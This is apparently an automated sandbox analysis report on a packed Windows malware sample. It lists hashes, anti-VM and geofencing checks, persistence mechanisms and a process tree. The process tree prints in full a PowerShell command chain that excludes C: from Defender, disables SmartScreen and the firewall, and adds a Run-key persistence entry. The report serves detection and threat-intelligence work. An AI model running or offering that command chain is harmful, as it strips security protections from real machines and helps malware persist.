Analysis
- max time kernel: 165s
- max time network: 165s
- platform: windows10-2004_x64
- resource: win10v2004-en-20220112
- submitted: 15-02-2022 07:34

Static task: static1

Behavioral task: behavioral1
- Sample: a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
- Resource: win7-en-20211208

Behavioral task: behavioral2
- Sample: a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
- Resource: win10v2004-en-20220112
General
- Target: a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
- Size: 3.3MB
- MD5: 54da56b5f62fedb130a09c3bdc7c8e08
- SHA1: 1c5f44b45d798534f3d047d8f2596439ba02140c
- SHA256: a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99
- SHA512: c76c39305b9f216a114b255c3388c40e0981cd2a6a41ff7aab10d3ce346349910a200ad3e16cf570909752d64f726e3b04d2ba07209a207e6311cc3d78d2fefc
Malware Config
Signatures

Modifies security service 2 TTPs 1 IoCs
Sets the start type of mpssvc (the Windows Defender Firewall service) to 4, which is SERVICE_DISABLED.
Processes:
- powershell.exe: Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4"

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs

Downloads MZ/PE file

Executes dropped EXE 3 IoCs
Processes:
- pid 2968 UpSys.exe
- pid 1992 UpSys.exe
- pid 1204 UpSys.exe

Modifies Windows Firewall 1 TTPs
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
- a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
- a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
Checks computer location settings 2 TTPs 1 IoCs
Looks up the country code configured in the registry, likely a geofence.
Processes:
- a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe: Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation
Drops startup file 1 IoCs
Processes:
- a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe: File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk

Themida packer 3 IoCs
Processes (resource: yara_rule):
- behavioral2/memory/640-130-0x00007FF7D2850000-0x00007FF7D3158000-memory.dmp: themida
- behavioral2/memory/640-131-0x00007FF7D2850000-0x00007FF7D3158000-memory.dmp: themida
- C:\ProgramData\MicrosoftNetwork\System.exe: themida
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
- powershell.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinNet = "C:\\ProgramData\\MicrosoftNetwork\\System.exe"

Checks whether UAC is enabled 1 IoCs
Processes:
- a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe: Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Drops file in System32 directory 1 IoCs
Processes:
- powershell.exe: File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
- pid 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
Drops file in Windows directory 3 IoCs
Processes:
- TiWorker.exe: File opened for modification C:\Windows\WinSxS\pending.xml
- svchost.exe: File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\State\keyValueLKG.dat
- TiWorker.exe: File opened for modification C:\Windows\Logs\CBS\CBS.log
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
- MusNotifyIcon.exe: Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0
- MusNotifyIcon.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
Modifies data under HKEY_USERS 64 IoCs
Processes (64 entries, grouped by process):

svchost.exe, all under \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization:
- Set value (str) Config\GeoVersion_EndpointFullUri = "https://geover.prod.do.dsp.mp.microsoft.com/geoversion"
- Set value (int) Config\KVFileExpirationTime = "132895605555521796"
- Set value (int) Config\DODownloadMode = "1"
- Key created Usage
- Set value (int) Usage\CacheSizeBytes = "0"
- Set value (int) Usage\PeerInfoCount = "0"
- Set value (int) Usage\PriorityDownloadPendingCount = "0"
- Set value (int) Usage\DownloadMonthlyCdnBytes = "0"
- Set value (int) Usage\DownloadMonthlyRateFrCnt = "0"
- Set value (int) Usage\LinkLocalConnectionCount = "0"
- Set value (int) Usage\DownlinkBps = "0"
- Set value (int) Usage\NormalDownloadCount = "0"
- Set value (str) Usage\CPUpct = "3.703550"
- Set value (int) Usage\UplinkUsageBps = "0"
- Set value (int) Usage\BkDownloadRatePct = "45"
- Set value (int) Usage\UploadRatePct = "100"
- Set value (int) Usage\DownloadMonthlyCacheHostBytes = "0"
- Set value (int) Usage\MonthlyUploadRestriction = "0"
- Set value (int) Usage\UploadMonthlyInternetBytes = "0"
- Set value (int) Usage\CDNConnectionCount = "0"
- Set value (int) Usage\FrDownloadRatePct = "90"
- Set value (int) Usage\DownloadMonthlyLinkLocalBytes = "0"
- Set value (int) Usage\LANConnectionCount = "0"
- Set value (int) Usage\UplinkBps = "0"
- Set value (int) Usage\DownlinkUsageBps = "0"
- Set value (int) Usage\SwarmCount = "1"
- Set value (int) Usage\DownloadMonthlyInternetBytes = "0"
- Set value (int) Usage\DownloadMonthlyRateFrBps = "0"
- Set value (int) Usage\NormalDownloadPendingCount = "0"

powershell.exe, all under \REGISTRY\USER\.DEFAULT\Software:
- Key created Microsoft\SystemCertificates\Root
- Key created Microsoft\SystemCertificates\Root\Certificates
- Key created Microsoft\SystemCertificates\Root\CRLs
- Key created Microsoft\SystemCertificates\CA\CTLs
- Key created Microsoft\SystemCertificates\trust
- Key created Microsoft\SystemCertificates\trust\Certificates
- Key created Microsoft\SystemCertificates\trust\CRLs
- Key created Microsoft\SystemCertificates\SmartCardRoot
- Key created Microsoft\SystemCertificates\SmartCardRoot\Certificates
- Key created Microsoft\SystemCertificates\SmartCardRoot\CTLs
- Key created Microsoft\SystemCertificates\SmartCardRoot\CRLs
- Key created Microsoft\SystemCertificates\Disallowed
- Key created Microsoft\SystemCertificates\Disallowed\Certificates
- Key created Microsoft\SystemCertificates\Disallowed\CRLs
- Key created Microsoft\SystemCertificates\TrustedPeople\Certificates
- Key created Microsoft\SystemCertificates\TrustedPeople\CRLs
- Key created Policies\Microsoft\SystemCertificates\CA
- Key created Policies\Microsoft\SystemCertificates\CA\Certificates
- Key created Policies\Microsoft\SystemCertificates\trust
- Key created Policies\Microsoft\SystemCertificates\trust\Certificates
- Key created Policies\Microsoft\SystemCertificates\trust\CRLs
- Key created Policies\Microsoft\SystemCertificates\trust\CTLs
- Key created Policies\Microsoft\SystemCertificates\Disallowed
- Key created Policies\Microsoft\SystemCertificates\Disallowed\Certificates
- Key created Policies\Microsoft\SystemCertificates\Disallowed\CTLs
- Key created Policies\Microsoft\SystemCertificates\TrustedPeople
- Key created Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates
- Key created Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs
- Key created Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs
- Key created Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
- Set value (int) Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"
- Set value (int) Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"
- Set value (int) Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"

UpSys.exe, under \REGISTRY\USER\.DEFAULT\Software:
- Key created Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
- Set value (int) Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
- pid 1396 powershell.exe (listed twice)
- pid 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe (listed repeatedly; the bulk of the 64 entries)
- pid 2968 UpSys.exe (listed twice)
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
- pid 1396 powershell.exe: Token: SeDebugPrivilege, SeBackupPrivilege (twice), SeRestorePrivilege, SeSecurityPrivilege
- pid 2968 UpSys.exe: Token: SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, 0
- pid 1992 UpSys.exe: Token: SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege
- pid 4076 powershell.exe: Token: SeDebugPrivilege
- pid 1272 TiWorker.exe: Token: SeSecurityPrivilege, SeRestorePrivilege, SeBackupPrivilege (cycled repeatedly; the bulk of the 64 entries)
Suspicious use of WriteProcessMemory 8 IoCs
Processes (source pid/process -> target pid/process):
- PID 640 a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe wrote to memory of 1396 powershell.exe (2 entries)
- PID 1396 powershell.exe wrote to memory of 2968 UpSys.exe (2 entries)
- PID 1396 powershell.exe wrote to memory of 2664 netsh.exe (2 entries)
- PID 1204 UpSys.exe wrote to memory of 4076 powershell.exe (2 entries)
Processes (process tree; indentation shows parent/child depth)

- C:\Users\Admin\AppData\Local\Temp\a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99.exe"
  Signatures:
  - Checks BIOS information in registry
  - Checks computer location settings
  - Drops startup file
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory

  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
    Signatures:
    - Modifies security service
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    - C:\ProgramData\UpSys.exe
      Command line: "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
      Signatures:
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

      - C:\ProgramData\UpSys.exe
        Command line: "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
        Signatures:
        - Executes dropped EXE
        - Suspicious use of AdjustPrivilegeToken

        - C:\ProgramData\UpSys.exe
          Command line: "C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
          Signatures:
          - Executes dropped EXE
          - Modifies data under HKEY_USERS
          - Suspicious use of WriteProcessMemory

          - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
            Signatures:
            - Drops file in System32 directory
            - Modifies data under HKEY_USERS
            - Suspicious use of AdjustPrivilegeToken

    - C:\Windows\system32\netsh.exe
      Command line: "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off

- C:\Windows\system32\MusNotifyIcon.exe
  Command line: %systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 13
  Signatures:
  - Checks processor information in registry

- C:\Windows\System32\svchost.exe
  Command line: C:\Windows\System32\svchost.exe -k NetworkService -p
  Signatures:
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS

- C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
  Command line: C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
  Signatures:
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

- C:\ProgramData\MicrosoftNetwork\System.exe (same hashes as the submitted sample)
  MD5: 54da56b5f62fedb130a09c3bdc7c8e08
  SHA1: 1c5f44b45d798534f3d047d8f2596439ba02140c
  SHA256: a1c9b78a291901d7046204a1c12a3012753e315f747226ce84b2a1888d08eb99
  SHA512: c76c39305b9f216a114b255c3388c40e0981cd2a6a41ff7aab10d3ce346349910a200ad3e16cf570909752d64f726e3b04d2ba07209a207e6311cc3d78d2fefc

- C:\ProgramData\UpSys.exe (listed four times with identical hashes)
  MD5: efe5769e37ba37cf4607cb9918639932
  SHA1: f24ca204af2237a714e8b41d54043da7bbe5393b
  SHA256: 5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
  SHA512: 33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

Memory dumps (name, filesize):
- memory/640-131-0x00007FF7D2850000-0x00007FF7D3158000-memory.dmp: 9.0MB
- memory/640-132-0x00007FFBA0630000-0x00007FFBA0632000-memory.dmp: 8KB
- memory/640-130-0x00007FF7D2850000-0x00007FF7D3158000-memory.dmp: 9.0MB
- memory/1396-139-0x0000015CB2383000-0x0000015CB2385000-memory.dmp: 8KB
- memory/1396-144-0x0000015CB2388000-0x0000015CB2389000-memory.dmp: 4KB
- memory/1396-143-0x0000015CB2386000-0x0000015CB2388000-memory.dmp: 8KB
- memory/1396-140-0x0000015CB2390000-0x0000015CB23B2000-memory.dmp: 136KB
- memory/1396-137-0x00007FFB7F403000-0x00007FFB7F405000-memory.dmp: 8KB
- memory/1396-138-0x0000015CB2380000-0x0000015CB2382000-memory.dmp: 8KB
- memory/4076-158-0x0000013C43890000-0x0000013C43892000-memory.dmp: 8KB
- memory/4076-157-0x00007FFB7F403000-0x00007FFB7F405000-memory.dmp: 8KB
- memory/4076-159-0x0000013C43893000-0x0000013C43895000-memory.dmp: 8KB
- memory/4076-160-0x0000013C43896000-0x0000013C43898000-memory.dmp: 8KB
- memory/4076-161-0x0000013C5F050000-0x0000013C5F094000-memory.dmp: 272KB
- memory/4076-162-0x0000013C5F4A0000-0x0000013C5F516000-memory.dmp: 472KB